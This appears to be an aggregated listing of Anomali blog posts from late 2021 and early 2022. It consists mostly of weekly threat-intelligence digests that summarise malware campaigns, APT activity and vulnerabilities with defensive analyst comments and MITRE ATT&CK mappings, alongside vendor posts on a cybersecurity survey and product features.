Russian Cyber Activity is focused on seven threat actor groups: Six groups are well-known Russian advanced persistent threat (APT) groups: Berserk Bear, Cozy Bear (APT29), Fancy Bear (APT28), Gamaredon (Primitive Bear), Turla (Venomous Bear), and Voodoo Bear (Sandworm).
Additionally, we’ve included Evil Corp (Dridex, Indrik Spider) group. Although typically financially motivated, its leader is known to work for Russia’s Federal Security Services (FSB) and has conducted cyber operations on behalf of the Russian government.[2]
Anomali customers using ThreatStream, Match, and Lens are able to immediately detect any IOCs present in their environments and quickly consume threat bulletins containing machine-readable IOCs. This enables analysts to quickly operationalize threat intelligence across their security infrastructures, as well as communicate to all stakeholders if and how they have been impacted.
Anomali recently added thematic dashboards that respond to significant global events as part of ongoing product enhancements that further automate and speed essential tasks performed by threat intelligence and security operations analysts. In addition to Russian Cyber Activity, ThreatStream customers currently have access to multiple dashboards announced as part of our recent quarterly product release.
Customers can easily integrate the Russian Cyber Activity dashboard, among others, in the “+ Add Dashboard” tab in the ThreatStream console:
Endnotes
[1] “Attack on Ukrainian Government Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy “Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618.
[2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845. |
Threat Guideline | APT 29 APT 29 APT 28 | |
|
2022-02-23 18:46:00 | Anomali Cyber Watch: EvilPlayout: Attack Against Iran\'s State Broadcaster, Microsoft Teams Targeted With Takeover Trojans, \'Ice phishing\' on the blockchain and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Emotet, Ice Phishing, Iran, Trickbot and Zoho. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
EvilPlayout: Attack Against Iran’s State Broadcaster
(published: February 18, 2022)
Checkpoint Researchers have released an article detailing their findings regarding a wave of cyber attacks directed at Iranian broadcast infrastructure during late January 2022. IRIB, an Iranian state broadcaster, was compromised, with malicious executables and wipers being responsible for the attack. Said malware had multiple functions, including hijacking of several tv stations to play recordings of political opposition leaders demanding the assassination of Iran’s supreme leader. Additional functionality includes custom backdoors, screenshot capability and several bash scripts to download other malicious executables. The malware appears new, with no previous appearances, nor has there been any actor attribution as of the date of publication.
Analyst Comment: Utilize all telemetry and feed it into a SIEM to help identify malicious activity within your network. Anomali Match can collide this telemetry against global intelligence to assist in identifying malicious indicators within your network. A defense in depth approach will also mitigate the damage any compromises can do to your infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Screen Capture - T1113
Tags: Iran, IRIB, Ava, Telewebion
Microsoft Teams Targeted With Takeover Trojans
(published: February 17, 2022)
Researchers at Avanan have documented a new phishing technique that threat actors are using that abuses the trust users of Microsoft Teams have for the platform to deliver malware. Threat Actors send phishing links to victims which initiate a chat on the platform, after which they will post a link to a dll file within the chat box. When clicked, it will install a trojan of choice on the target machine. With over 279 million users, this presents a new attack vector for threat actors to abuse.
Analyst Comment: Never click on a link or open attachments from untrusted senders when receiving email. Be skeptical of strangers attempting to move conversation to another platform, even if you use that platform. Be wary of links posted in apps that are used for communication, as links that are posted on trusted platforms are not trustworthy themselves.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Trusted Relationship - T1199
Tags: Microsoft Teams, trojan, phishing
Red Cross: State Hackers Breached our Network Using Zoho bug
(published: February 16, 2022)
The International Committee of the Red Cross (ICRC) suffered a data breach during January 2022. The incident led to the exfiltration of over 515,000 individual's PII, linked to their Restoring Family Links pro |
Ransomware Data Breach Malware Tool Vulnerability Threat Guideline | ||
|
2022-02-17 12:00:00 | For Richer or Poorer: Enterprise Orgs Say they Have a Poor Understanding of Cyber Risks (lien direct) | initIframe('620bc17d69f13f5a47d135db'); Welcome to this weeks blog, where I'll dive deeper into the Top 10 Cybersecurity Challenges enterprise organizations face, as found in our recently released Cybersecurity Insights Report 2022: The State of Cyber Resilience. #10 - Poor Understanding of Cyber Risk While cybersecurity has become a major concern for businesses around the globe, a majority of enterprise security decision-makers listed a "Poor Understanding of Cyber Risk" as number ten in our list. While a greater understanding comes with security maturity, it's worrying that some organizations have a poor understanding of the cyber risk they face. But when you think of the digitally connected world we live in, it all makes sense. Technology continues to develop at an incredible pace, playing an important role in our personal lives, at work, and when making business decisions. The more reliant we become on technology, the bigger the risk that attackers can infiltrate systems and steal valuable information. One of the most common challenges in defending against cyber threats is that many organizations don't understand the true nature and scope of their cyber risk exposure, including the fact that most organizational leaders lack an understanding and effective assessment of cyber risks their organizations face. This can lead to an inability to prioritize security investments or even worse, make decisions based on inaccurate assumptions about the threats facing their organization. PWC defines cyber risk as any risk associated with financial loss, disruption, or damage to the reputation of an organization from failure, unauthorized or erroneous use of its information systems. In many cases, the more sophisticated and extensive a business' digital operations, the higher the cyber risk involved. However, it doesn't matter whether you're a Fortune 100 company or small business, if you lack a true understanding of the cyber risks targeting your business and are not adequately protected against cyberattacks, you could be vulnerable. In any event, it's important to get more acquainted with the cyber risks you might be facing. Typical elements that can increase cyber risk include: Remote access for employees, customers or third-parties A lenient password policy Employees using company-issued devices for personal use Access to administrative privileges on your company's network or computer systems Bring Your Own Device (BYOD) policy in the workplace Not reviewing or updating your cyber security policies each year By 2025, 70% of CEOs will mandate a culture of organizational resilience to survive coincident threats from cybercrime, severe weather events, civil unrest and political instabilities. Gartner Understanding Your Risk Cyber risk is growing as cybercrime evolves, and it has never been more important for a business to have a system of precautionary measures in place. Cybercriminals often target businesses because they believe that the data stored within these companies is worth stealing. Executives must identify the value and sensitivity of the information in their organization to minimize risks. There are several ways enterprise organizations can improve their understanding of their organization's cyber risk exposure, including cyber risk assessment tools, using internal teams to conduct a threat hun | Threat Guideline | ||
|
2022-02-15 20:01:00 | Anomali Cyber Watch: Mobile Malware Is On The Rise, APT Groups Are Working Together, Ransomware For The Individual, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Mobile Malware, APTs, Ransomware, Infostealers, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
What’s With The Shared VBA Code Between Transparent Tribe And Other Threat Actors?
(published: February 9, 2022)
A recent discovery has been made that links malicious VBA macro code between multiple groups, namely: Transparent Tribe, Donot Team, SideCopy, Operation Hangover, and SideWinder. These groups operate (or operated) out of South Asia and use a variety of techniques with phishing emails and maldocs to target government and military entities within India and Pakistan. The code is similar enough that it suggests cooperation between APT groups, despite having completely different goals/targets.
Analyst Comment: This research shows that APT groups are sharing TTPs to assist each other, regardless of motive or target. Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Phishing - T1566
Tags: Transparent Tribe, Donot, SideWinder, Asia, Military, Government
Fake Windows 11 Upgrade Installers Infect You With RedLine Malware
(published: February 9, 2022)
Due to the recent announcement of Windows 11 upgrade availability, an unknown threat actor has registered a domain to trick users into downloading an installer that contains RedLine malware. The site, "windows-upgraded[.]com", is a direct copy of a legitimate Microsoft upgrade portal. Clicking the 'Upgrade Now' button downloads a 734MB ZIP file which contains an excess of dead code; more than likely this is to increase the filesize for bypassing any antivirus scan. RedLine is a well-known infostealer, capable of taking screenshots, using C2 communications, keylogging and more.
Analyst Comment: Any official Windows update or installation files will be downloaded through the operating system directly. If offline updates are necessary, only go through Microsoft sites and subdomains. Never update Windows from a third-party site due to this type of attack.
MITRE ATT&CK: [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: RedLine, Windows 11, Infostealer
|
Ransomware Malware Tool Vulnerability Threat Guideline | Uber APT 43 APT 36 APT-C-17 | |
|
2022-02-08 16:00:00 | Anomali Cyber Watch: Conti Ransomware Attack, Iran-Sponsored APTs, New Android RAT, Russia-Sponsored Gamaredon, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, RATs, SEO poisoning, and Spearphishing. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New CapraRAT Android Malware Targets Indian Government and Military Personnel
(published: February 7, 2022)
Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device.
Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072
Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT
Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine
(published: February 3, 2022)
The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis.
Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis |
Ransomware Malware Threat Conference | APT 35 APT 35 APT 29 APT 29 APT 36 | ★★ |
|
2022-02-02 23:25:00 | Top 10 Cybersecurity Challenges Enterprise Organizations Face (lien direct) | Welcome to the first in a series of blog posts where I'll dive deeper into the Top 10 Cybersecurity Challenges enterprise organizations face, as found in our recently released Cybersecurity Insights Report 2022: The State of Cyber Resilience. Cybersecurity has become a major concern for businesses around the globe. The threat landscape continues to evolve at a rapid pace, and cybercriminals continue to develop new ways to exploit vulnerabilities in systems. One of the key findings in the report stated that 87% of organizations surveyed had suffered a cyber attack over the past three years. In some ways, it's surprising as organizations continue to invest in cybersecurity tools. In other ways, it's not, as threats and threat actors have been increasing in sophistication. The pandemic added a social engineering element where attackers could play upon the public's fears. Organizations Are Falling Short Of Their Goals & Face A Slew Of Challenges Mitigating, Detecting, & Responding To Cyber Threats What's clear is that despite increasing investment and all the great work cyber professionals are doing, there are still some challenges organizations face in ensuring their cybersecurity posture is as resilient as it needs to be. The report identified the following Top 10 Cybersecurity Challenges enterprise organizations face: Maintaining a pulse on new and emerging global cybersecurity threats Speed and complexity of digital transformation Utilizing the latest cybersecurity solutions (e.g., XDR) Lack of skilled cybersecurity professionals Solutions not customized to the types of risks we face Lack of integrated cybersecurity solutions Lack of ability to share threat intelligence cross-functionally Underutilization of frameworks to support investigations Lack of threat intelligence information Poor understanding of cyber risks At first glance, it looks like it’s the same challenges the industry has been discussing forever. Organizations lack visibility or threat intelligence to help them identify threats; digital transformation has increased their ever-growing attack surface; the cyber skills gap is still an issue, and organizations are still working in siloed environments. But there are also some new challenges. Organizations are struggling with implementing new technologies, like XDR, and are being hindered by the fact that those technologies are not customizable to each organization. What it boils down to is that, in short, these challenges are contributing to the cyber incidents that are taking a financial toll on nearly all organizations. With losses from targeted cyberattacks, malware campaigns, phishing, insider threats, and associated data breaches running well into the hundreds of thousands of dollars per organization. So, why haven't these challenges been resolved? That's hard to pinpoint. Cyberattacks are becoming more frequent and damaging. Attackers and threats are becoming more sophisticated. New challenges will continue to rise and fall. Cybersecurity professionals need to adapt to keep up with the ever-changing threat landscape. What’s clear is that cybercrime costs companies billions of dollars each year. In addition to financial losses, cyberattacks also put sensitive information at risk. Companies must take steps to prevent these threats before they happen. In the coming weeks, we'll take a deeper look into each challenge and outline some ways to help mitigate those challenges. In the meantime, download our new report to learn more. | Malware Threat | ||
|
2022-02-01 18:55:00 | Anomali Cyber Watch: Researchers Break Down WhisperGate Wiper Malware, Trickbot Will Now Try To Crash Researcher PCs to Stop Reverse Engineering Attempts, New DeadBolt Ransomware Targets QNAP Devices (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: CVE-2022-21882, DazzleSpy , DeadBolt, DTPacker, Trickbot, and WhisperGate. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Windows Vulnerability With New Public Exploits Lets You Become Admin
(published: January 29, 2022)
A new vulnerability, tracked as CVE-2022-21882 was discovered by researcher RyeLv in early January 2022. The exploit is a bypass to a previous vulnerability, CVE-2021-1732, and affects all Windows 10 machines that have not applied January’s Patch Tuesday patch. This vulnerability is a privilege escalation exploit, which grants administrator level privileges and allows for the creation of new admin accounts, as well as lateral movement. The exploit abuses a flaw in the manner in which the kernel handles callbacks, changing the flag ConsoleWindow. This will modify the window type, and tricks the system into thinking tagWND.WndExtra is an offset of the kernel desktop heap, thereby granting administrator level read and write access.
Analyst Comment: Apply patches when they become available to keep your systems and assets protected from the latest attacks and vulnerabilities. This is essential when new vulnerabilities are discovered as threat actors will actively attempt to exploit them. A strong patch management policy combined with an effective asset management policy will assist you in keeping your assets up to date and protected.
MITRE ATT&CK: [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Process Discovery - T1057
Tags: Windows, Priviledge escalation, CVE-2021-1732, CVE-2022-21882
Shipment-Delivery Scams Become the Favored Way to Spread Malware
(published: January 28, 2022)
Researchers at Cofense and Checkpoint have documented a series of Phishing campaigns throughout Q4 of 2021. The campaign imitates large known delivery brands such as DHL or the US postal service, and aims to abuse the trust these companies have associated with them to manipulate their targets into clicking malicious links or files. The most prominent tactic is to provide a link to a missed package, capitalizing on current global supply chain issues. Once clicked, TrickBot malware is delivered, though other campaigns are delivering as of yet non-attributed trojans. The malicious links in these campaigns are not particularly sophisticated, and are easily identified as false as they lead to domains outside the company they are targeting.
Analyst Comment: Never click on attachments or links from untrustworthy sources, and verify with the legitimate sender the integrity of these emails. Treat any email that attempts to scare, coerce, provide a time limit or force you to click links or attachments with extreme suspicion.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Phishing |
Ransomware Malware Vulnerability Threat Guideline | NotPetya | |
|
2022-01-25 16:00:00 | Anomali Cyber Watch: MoonBounce, AccessPress, QR Code Scams and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Linux Malware, Supply-Chain Attacks, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
FBI Warns Of Malicious QR Codes Used To Steal Your Money
(published: January 23, 2022)
The Federal Bureau of Investigation (FBI) recently released a notice that malicious QR codes have been found in the wild. These codes, when scanned, will redirect the victim to a site where they are prompted to enter personal and payment details. The site will then harvest these credentials for cybercriminals to commit fraud and empty bank accounts. This threat vector has been seen in Germany as of December 2021.
Analyst Comment: Always be sure to check that emails have been sent from a legitimate source, and that any financial details or method of payment is done through the website. While QR codes are useful and being used by businesses more often, it is easy for cybercriminals to perform this kind of scam. If scanning a physical QR code, ensure the code has not been replaced with a sticker placed on top of the original code. Check the final URL to make sure it is the intended site and looks authentic.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566
Tags: EU & UK, Banking and Finance
MoonBounce: The Dark Side Of UEFI Firmware
(published: January 20, 2022)
Kaspersky has reported that in September 2021, a bootloader malware infection had been discovered that embeds itself into UEFI firmware. The malware patches existing UEFI drivers and resides in the SPI flash memory located on the motherboard. This means that it will persist even if the hard drive is replaced. Code snippets and IP addresses link the activity to APT41, a group that is operated by a group of Chinese-speaking individuals. MoonBounce is highly sophisticated and very difficult to detect.
Analyst Comment: Systems should be configured to take advantage of Trusted Platform Module (TPM) hardware security chips to secure their systems' boot image and firmware, where available. Secure boot is also a viable option to mitigate against attacks that would patch, reconfigure, or flash existing UEFI firmware to implant malicious code.
MITRE ATT&CK: [MITRE ATT&CK] Pre-OS Boot - T1542 | [MITRE ATT&CK] Data Obfuscation - T1001 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Hijack Execution Flow - T1574 | |
Ransomware Malware Tool Vulnerability Threat Guideline | APT 41 APT 28 | |
|
2022-01-20 16:00:00 | Anomali Cybersecurity Insights Report 2022, Your First Step Towards Cyber Resilience (lien direct) | Anomali is focused on helping customers to gain an advantage over the most advanced threat actors in the world. Since our inception, we’ve added innovations built on top of our global intelligence capabilities that have grown from just showing you who your adversaries are to enabling you to stop them before they have a chance to disrupt your business. Today, the Anomali Threat Research Team reached another major milestone with the publication of the Anomali Cybersecurity Insights Report 2022. To gather and develop foundational data for this report, Anomali commissioned The Harris Poll to survey 800 Security Decision Makers across 11 countries from enterprises with 5,000 or more employees. The Anomali Threat Research team analyzed the findings to provide insights on what they mean and actionable guidance on how to overcome obstacles standing in the way of cyber resilience. Because COVID-19 has had such a profound impact on business and cybersecurity, we queried decision makers to understand their cybersecurity postures and challenges going back to 2019. Among the top takeaways is that even with significant investments made in cybersecurity over this period, many organizations still face obstacles to achieving the level of cyber resilience needed to protect against, detect, and respond to attackers. This finding may come as no surprise to most readers, given the increased attention that the news and social media gives to data breaches and cyberattacks. What we didn’t know though, was at what level global enterprises as a whole are being impacted. This new research reveals that in the past three years, 87 percent of enterprise security decision makers were the victims of successful cyberattacks perpetrated against them that resulted in damage, disruption, or a breach to their business. The report also puts some concrete numbers around just how much the threat landscape has changed in terms of the actual increase in the number of cyberattacks taking place since the pandemic began. Findings showed that 83 percent of enterprise security decision makers have experienced more attempted cyberattacks that include an increase in phishing and the use of COVID-19 as a lure. The findings did not equate to all bad news by any means. We were encouraged to learn that many organizations are devoting more resources to cybersecurity and adopting innovative technologies to become more resilient in the face of escalating attacks. Many enterprise security decision makers said their organizations are currently using, or are planning to invest in, recent innovations associated with Extended Detection and Response (XDR), Advanced Threat Intelligence, and the MITRE ATT&CK Framework. | Threat | ||
|
2022-01-19 22:45:00 | Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, HTTP Stack, Malspam, North Korea, Phishing, Russia and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques
(published: January 17, 2022)
The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2.
Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow |
Ransomware Malware Tool Vulnerability Threat Patching Guideline | APT 41 APT 38 APT 29 APT 28 APT 28 | |
|
2022-01-13 13:58:00 | How Anomali Handles Log4j (lien direct) | Recent attacks related to the Apache Log4j vulnerabilities, Solar Winds, and the Emotet ransomware resurgence require global visibility, big data correlation and a comprehensive response to get ahead of the attack chain. Anomali’s platform, including ThreatStream, Lens, and Match accelerates response by leveraging the largest global intelligence repository to pinpoint threats in seconds, giving security professionals the tools they need to respond both to the attack, and the attacker. Here is how Defenders using Anomali got ahead of Log4j by effectively detecting the threat and prioritizing the response. Threat Investigation. To start, Defenders had Anomali’s machine learning curated intelligence on Log4j within hours of global discovery. This included all known attack indicators and impacted vulnerabilities displayed on a dashboard that visualized the potential risk, allowing them to either further investigate, or to immediately respond. Threat Research. Defenders that chose to continue their research used Anomali’s Investigation capability to enrich the Log4j data with context on observed vulnerabilities, geolocation of attackers, and other intelligence that further increased fidelity. Additionally, using Anomali Lens, Defenders researched public, private, and security monitoring intel sources to collect new attack information to be used for detection. Threat Detection. Defenders used the high-fidelity signals collected through the investigation and research process to quickly detect Log4j attacks using Match Forensic and Retrospective search. Able to correlate a massive amount of security telemetry together with global intelligence, Match determined whether the organization was a victim of a Log4j attack within seconds. And because most advanced attacks leverage techniques that have existed for years, Match’s big data approach was able to detect other breaches going back as far as five years. Threat Response. Finally, using Anomali’s MITRE ATT&CK dashboard, Defenders were able to visualize the impact of the detected attack on their existing security posture. With this information, they pivoted to a response based on Anomali provided mitigation strategies and detection signatures to bolster their security against existing and future breaches. To complete the response cycle, automated dissemination of machine-readable threat intelligence to the organization’s security controls using Anomali Integrator ensured that the organization’s security posture could detect new and evolving Log4j related attacks. Based on customer testimonials, with Anomali, what would have taken them hours or days to simply identify a breach, turned into minutes to detect, prioritize, and protect against immediate – and future Log4j cyber threats. Log4j threat detection intelligence delivered by Anomali Threat Research | Ransomware Threat | ||
|
2022-01-12 16:00:00 | Anomali Cyber Watch: FluBot, iOS, Ransomware, Zloader, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Attack Misuses Google Docs Comments to Spew Out “Massive Wave” of Malicious Links
(published: January 7, 2022)
Security researchers have seen a very large number of attacks leveraging the comment features of Google Docs to send emails to users containing malicious content. The attackers can create a document, sheet, or slides and add comments tagging any user's email address. Google then sends an email to the tagged user account. These emails come from Google itself and are more likely to be trusted than some other phishing avenues.
Analyst Comment: Phishing education can often help users identify and prevent phishing attacks. Specific to this attack method, users should verify that any unsolicited comments that are received come from the user indicated, and if unsure, reach out separately to the user that appears to have sent the comment to verify that it is real. Links in email should be treated with caution.
MITRE ATT&CK:[MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Phishing - T1156
Tags: Google, Impersonation, Phishing
Finalsite Ransomware Attack Forces 5,000 School Websites Offline
(published: January 7, 2022)
Finalsite, a firm used by schools for website content management, design, and hosting, has been hit by an unknown strain of ransomware that affected approximately 5,000 of their 8,000 customers. The company has said in a statement that many of the affected sites were preemptively shut down to protect user's data, that there is no evidence of that data was breached (although they did not confirm that they had the needed telemetry in place to detect that), and that most of the sites and services have been restored.
Analyst Comment: Verified backup and disaster recovery processes are an important aspect of protecting organizations and allowing for remediation of successful attacks. Monitoring and telemetry can aid in detection and prevention from attacks, and provide evidence as to whether data has been exfiltrated.
MITRE ATT&CK:[MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Education, Finalsite, Ransomware, Web hosting
FluBot’s Authors Employ Creative and Sophisticated Techniques to Achieve Their Goals in Version 5.0 and Beyond
(published: January 6, 2022)
Security researchers have analyzed a new and more sophisticated version of the FluBot Android malware first detected in early 2020. Once installed on a device, the malware can full |
Ransomware Data Breach Malware Tool Vulnerability Threat Guideline | ||
|
2022-01-05 19:55:00 | Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom
(published: December 29, 2021)
The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD).
Analyst Comment: Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: ONUS, Log4Shell, CVE-2021-44228,
Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
(published: December 29, 2021)
Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified.
Analyst Comment: Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats.
MITRE ATT&CK: [MITRE ATT&CK] Dynamic Resolution - T1568 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Application Layer Protocol - T1071
Tags: DGA , Pegasus, Phishing
Implant.ARM.iLOBleed.a
(published: December 28, 2021)
Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server managemen |
Malware Hack Tool Vulnerability Threat | LastPass | |
|
2021-12-29 16:00:00 | Anomali Cyber Watch: Equation Group\'s Post-Exploitation Framework, Decentralized Finance (DeFi) Protocol Exploited, Third Log4j Vulnerability, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache Log4j 2, APT, Malspam, Ngrok relay, Phishing, Sandbox evasion, Scam, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard
(published: December 27, 2021)
